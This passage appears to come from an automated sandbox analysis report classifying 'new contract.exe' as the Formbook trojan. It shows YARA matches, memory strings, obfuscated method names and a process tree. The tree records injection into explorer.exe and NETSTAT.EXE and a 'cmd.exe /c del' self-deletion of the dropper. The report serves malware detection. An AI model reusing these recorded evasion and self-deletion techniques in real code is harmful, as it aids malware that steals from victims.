          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DBB2325_2_02DBB232
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DB5B325_2_02DB5B32
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DB5B305_2_02DB5B30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DB10825_2_02DB1082
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DB89125_2_02DB8912
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DBE5CD5_2_02DBE5CD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DB2D025_2_02DB2D02
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03197E54 appears 99 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 031CF290 appears 103 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 031BEA12 appears 86 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03185130 appears 58 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0313B970 appears 262 times
          Source: C:\Users\user\Desktop\new contract.exeCode function: String function: 01677E54 appears 107 times
          Source: C:\Users\user\Desktop\new contract.exeCode function: String function: 016AF290 appears 103 times
          Source: C:\Users\user\Desktop\new contract.exeCode function: String function: 01665130 appears 58 times
          Source: C:\Users\user\Desktop\new contract.exeCode function: String function: 0161B970 appears 262 times
          Source: C:\Users\user\Desktop\new contract.exeCode function: String function: 0169EA12 appears 86 times
          Source: new contract.exe, 00000000.00000002.1740008298.000000000126E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs new contract.exe
          Source: new contract.exe, 00000000.00000002.1744485602.0000000008E80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs new contract.exe
          Source: new contract.exe, 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs new contract.exe
          Source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs new contract.exe
          Source: new contract.exe, 00000002.00000002.1806931076.000000000171D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs new contract.exe
          Source: new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs new contract.exe
          Source: new contract.exeBinary or memory string: OriginalFilenameQTW.exe6 vs new contract.exe
          Source: new contract.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4142928612.000000000E4FB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: new contract.exe PID: 7424, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: new contract.exe PID: 7648, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: NETSTAT.EXE PID: 7732, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: new contract.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fgEBeMUyhH7sZUUckO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, fgEBeMUyhH7sZUUckO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fgEBeMUyhH7sZUUckO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@11/1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00681CFC GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,5_2_00681CFC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00681C89 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,5_2_00681C89
          Source: C:\Users\user\Desktop\new contract.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\new contract.exe.logJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
          Source: new contract.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: new contract.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\new contract.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: new contract.exeReversingLabs: Detection: 50%
          Source: unknownProcess created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe"
          Source: C:\Users\user\Desktop\new contract.exeProcess created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new contract.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\new contract.exeProcess created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new contract.exe"Jump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: iconcodecservice.dllJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: snmpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\new contract.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: new contract.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: new contract.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: netstat.pdbGCTL source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp, new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp, new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: new contract.exe, 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1808242227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1806702400.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: new contract.exe, new contract.exe, 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000003.1808242227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1806702400.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs.Net Code: U3QVC8bZLu System.Reflection.Assembly.Load(byte[])
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs.Net Code: U3QVC8bZLu System.Reflection.Assembly.Load(byte[])
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs.Net Code: U3QVC8bZLu System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041703B push ebx; retf 2_2_0041703C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_00416A52 push dword ptr [eax]; ret 2_2_00416A63
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_00405262 push ebx; ret 2_2_0040526F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_004163E0 push ebp; ret 2_2_0041645B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0040A464 push es; retf 2_2_0040A466
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041D4CB push eax; ret 2_2_0041D532
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041D52C push eax; ret 2_2_0041D532
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041774A push cs; ret 2_2_0041774B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041AF82 push 00000074h; ret 2_2_0041AF8C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_015F225F pushad ; ret 2_2_015F27F9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_015F27FA pushad ; ret 2_2_015F27F9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016209AD push ecx; mov dword ptr [esp], ecx2_2_016209B6
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_015F283D push eax; iretd 2_2_015F2858
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_015F1365 push eax; iretd 2_2_015F1369
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4E6B02 push esp; retn 0000h3_2_0E4E6B03
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4E6B1E push esp; retn 0000h3_2_0E4E6B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4E69B5 push esp; retn 0000h3_2_0E4E6AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB45B1E push esp; retn 0000h3_2_0FB45B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB45B02 push esp; retn 0000h3_2_0FB45B03
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB459B5 push esp; retn 0000h3_2_0FB45AE7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_006860DD push ecx; ret 5_2_006860F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031409AD push ecx; mov dword ptr [esp], ecx5_2_031409B6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052703B push ebx; retf 5_2_0052703C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00515262 push ebx; ret 5_2_0051526F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_005263E0 push ebp; ret 5_2_0052645B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052D475 push eax; ret 5_2_0052D4C8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0051A464 push es; retf 5_2_0051A466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052D4C2 push eax; ret 5_2_0052D4C8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052D4CB push eax; ret 5_2_0052D532
          Source: new contract.exeStatic PE information: section name: .text entropy: 7.83819492389617
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, SOwVvHMwinIr4CVPeB.csHigh entropy of concatenated method names: 'Dispose', 'aI87mJBnb1', 'jKSqXh431R', 'm6ebbuCEuC', 'vyY7F10NkP', 'y1M7z1kJdj', 'ProcessDialogKey', 'mV5q8Nbj4n', 'K0dq71HYwv', 'nigqq3REnx'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, uf9aokYYeocPIOSosy.csHigh entropy of concatenated method names: 'ekYAnEi5yt', 'g0kAMt1aRF', 'DEHuf1e4pw', 'UEMusKJwCK', 'ktHuKPGsns', 'R51u9myGsQ', 'KdkuJJqPRd', 'hhAuZSGJw2', 'IKcujRYdBA', 'tKIuxEF0Pj'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, QQTpKp75Qv0RWvQaoE.csHigh entropy of concatenated method names: 'UxEOcxTPdk', 'NRMOX6GNmV', 'VwiOfIUlWg', 'xBfOsgDlPW', 'ysoO4sQIdk', 'VJZOKaADJj', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, BdAaLxlyFpvWDFdhFt.csHigh entropy of concatenated method names: 'xAQY3xZshw', 'HFmYh3i4mA', 'rKMYCGXLbN', 'Wy1YEoRtNZ', 'A4xYnnAa9B', 'k1BYGWcf2J', 'bjvYMw44ve', 'CKhY0diM9Y', 'XFLYPudrcb', 'gGgYw5EWNs'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.csHigh entropy of concatenated method names: 'Bt4TLdUcQu', 'NHiTpK9ow5', 'KLoTainbXn', 'UAfTuWPf6S', 'nbdTAqCCuH', 'YnuTkX58rc', 'ViXTYrwlcv', 'skSTBbWqr4', 'zLITURJXrC', 'MUsTIR6eRE'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, zEP9MvkRynobcNIcT7.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nM2qmOa6TN', 'RNrqF2inTm', 'PWeqzEgHDs', 'jluT8iXvyd', 'YrfT7E6FHA', 'rqCTqhgHJH', 'NkFTTqIebR', 'LpuL7NOyBiKZJDjlnug'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, nBjC5FWVGlwu26wPqR.csHigh entropy of concatenated method names: 'ToString', 'QReSiZuu4y', 'tCFSXZJvKP', 'FM7Sfjq6FD', 'zjWSsuVrCk', 'ycxSKIgBpu', 'E29S9TCIva', 'id8SJvdwbo', 'MFiSZXNZls', 'IiYSjmqc9h'
